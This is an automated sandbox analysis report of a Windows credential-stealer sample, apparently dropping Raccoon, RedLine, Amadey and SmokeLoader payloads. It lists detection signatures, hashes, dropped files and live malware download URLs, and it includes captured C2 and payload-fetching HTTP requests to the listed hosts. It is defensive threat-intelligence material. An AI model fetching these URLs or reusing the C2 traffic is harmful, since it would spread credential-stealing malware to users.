Windows Analysis Report cnv622JnZv.exe

Overview

General Information

Sample Name: cnv622JnZv.exe
Analysis ID: 511932
MD5: 5ae3b69c31fe729ac672ba483280f16d
SHA1: 310d993f9fbe7fb9cf3892220d980e08eb5e6286
SHA256: 033247a6ba1cd0543f27857fb6743e16fdd2990cea1df3dce93e4031c8046d1a
Tags: exe, RaccoonStealer

Detection

Amadey Raccoon RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Early bird code injection technique detected
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: https://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://telegalive.top/O Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Source: http://telegalive.top/ Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\977B.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Avira: detection malicious, Label: HEUR/AGEN.1138925
Multi AV Scanner detection for domain / URL
Source: http://sysaheu90.top/game.exe Virustotal: Detection: 16%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\152F.exe ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\66A4.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\8615.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\A557.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\B084.exe ReversingLabs: Detection: 56%
Machine Learning detection for sample
Source: cnv622JnZv.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\152F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B084.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\bejhieg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\977B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A557.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8615.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jejhieg Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 34.0.977B.exe.400000.11.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 34.0.977B.exe.400000.15.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 18.0.C5EA.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.C5EA.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.9.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 19.0.jejhieg.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.jejhieg.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.5.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 34.0.977B.exe.400000.7.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 19.0.jejhieg.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 19.0.jejhieg.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.13.unpack Avira: Label: TR/AD.Amadey.ezxiu
Source: 18.0.C5EA.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 18.0.C5EA.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 34.0.977B.exe.400000.17.unpack Avira: Label: TR/AD.Amadey.ezxiu

Exploits:

Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 66A4.exe PID: 3536, type: MEMORYSTR

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49826 version: TLS 1.0
Uses 32bit PE files
Source: cnv622JnZv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 8615.exe, 00000018.00000000.413528464.0000000000417000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.418963154.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 977B.exe
Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: C5EA.exe, 00000011.00000000.349456240.0000000000401000.00000020.00020000.sdmp, C5EA.exe, 00000012.00000000.364889434.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 8615.exe, 00000018.00000002.441461960.000000006B451000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 8615.exe
Source: Binary string: DC:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041B9B2 FindFirstFileExW, 34_2_0041B9B2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49843 -> 185.215.113.45:80
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49847 -> 91.219.236.97:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.97
Source: global traffic HTTP traffic detected: GET //l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:10:12 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:10:01 GMTETag: "54000-5cf81bc649add"Accept-Ranges: bytesContent-Length: 344064Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 18:10:56 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 18:10:02 GMTETag: "92800-5cf81bc6a9a05"Accept-Ranges: bytesContent-Length: 600064Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:11:25 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytes
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49826 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xauocndh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gurxx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ktkcvjuue.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adlotmsqn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edkykp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://koyxalg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxdci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uixmltkfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqqrnpr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihqsjj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://civbpqln.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqobqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cuuhert.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpmovtar.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csbokajdc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adqaqqqe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjcvackirk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lylgknghko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wexymhl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glqydpsa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kqbwtkcju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdonp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfxrwj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://jxvawpr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://ctbemocusw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://wofjmrw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://xdcmurwfts.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 260 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://drroxf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://lqvvicnwkv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://hmylopjj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://pvxvmaqhni.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://bhlsdp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 354 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://vexln.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 309 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://ukjpg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://oahqstcrl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://sowcs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 312 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://yhtqeo.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 272 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://wepobp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://uriot.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 337 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://isqhctlhh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 257 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://pbejr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://ufipchi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://vlotoun.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: hajezey1.top
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49842 -> 93.115.20.139:28978
Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97/
Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97/.top&)
Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp, 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861
Source: 152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmp String found in binary or memory: http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861(
Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp String found in binary or memory: http://91.svchost.exe
Source: 77DC.exe String found in binary or memory: http://fontello.com
Source: 152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/
Source: 152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/O
Source: A557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: A557.exe String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: A557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
